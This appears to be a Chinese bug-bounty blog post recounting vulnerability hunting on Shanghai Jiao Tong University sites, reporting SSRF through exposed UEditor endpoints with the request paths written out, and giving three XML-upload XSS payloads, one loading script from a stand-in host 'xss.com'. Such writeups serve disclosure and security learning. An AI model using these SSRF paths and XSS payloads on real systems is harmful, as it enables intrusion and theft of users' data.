作者:辛巴大佬
前面几天的内容:
今天是edusrc漏洞挖掘第六天,还是老规矩,继续对edusrc排名第一的上海交通大学进行漏洞挖掘。
昨天我在看一个交大网站后台的时候,发现加载了一个请求。
看到路径加载了百度编辑器的信息,访问了编辑器路径,正常打开:
本来想通过脏字符直接上传shell,但是被拦截了。
所以,剩下的两个漏洞就只有,ssrf和一个储存xss漏洞。
第一个ssrf漏洞:
/ueditor/jsp/getRemoteImage.jsp?upfile=http://127.0.0.1/favicon.ico?.jpg
/ueditor/jsp/controller.jsp?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif
/ueditor/php/controller.php?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif
直接访问,存在就会抓取成功
成功如图,怕有人遍历所有网站路径,所以我把后面的码掉了。
第二个xml文件上传的xss:
直接在图片位置上传,本地新建一个xml文件,把poc放进去,在这里,我使用了弹窗poc验证,一下三个poc分别是:弹窗/跳转
/远程加载js
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(1);
</something:script>
</body>
</html>
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> window.location.href="https://baidu.com/";
</something:script>
</body>
</html>
<html>
<head></head>
<body>
<something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml">
</something:script>
</body>
</html>
xss成功访问如图:
还有我提交的很多交大漏洞没有修复完成,修复完成后,我会发出来,写这篇文章的前一个小时,我挖到了一个交大的高危,今天算是没白忙活,今天先这样,明天继续水。
原文始发于微信公众号(哈拉少安全小队):edusrc漏洞挖掘|我一眼就看出你这请求不对劲
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论